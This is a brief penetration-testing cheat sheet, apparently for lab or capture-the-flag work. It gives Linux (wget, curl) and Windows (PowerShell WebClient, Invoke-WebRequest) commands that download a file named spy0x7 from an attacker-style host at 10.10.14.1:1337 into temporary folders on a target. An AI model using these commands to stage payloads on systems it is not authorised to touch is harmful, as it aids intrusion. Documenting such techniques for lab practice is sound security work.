File Transfer

File transfer on both OS

File Transfer

Linux

wget 10.10.14.1:1337/spy0x7.py -O /tmp/spy0x7.py
curl 10.10.14.1:1337/spy0x7.py -o /tmp/spy0x7.py

Windows

(New-Object Net.WebClient).DownloadFile("http://10.10.14.1:1337/spy0x7.exe","C:\Windows\Temp\spy0x7.exe")
Invoke-WebRequest "http://10.10.14.1:1337/spy0x7.exe" -OutFile "spy0x7.exe"
wget "http://10.10.14.1:1337/spy0x7.exe" -OutFile "C:\Windows\Temp\spy0x7.exe"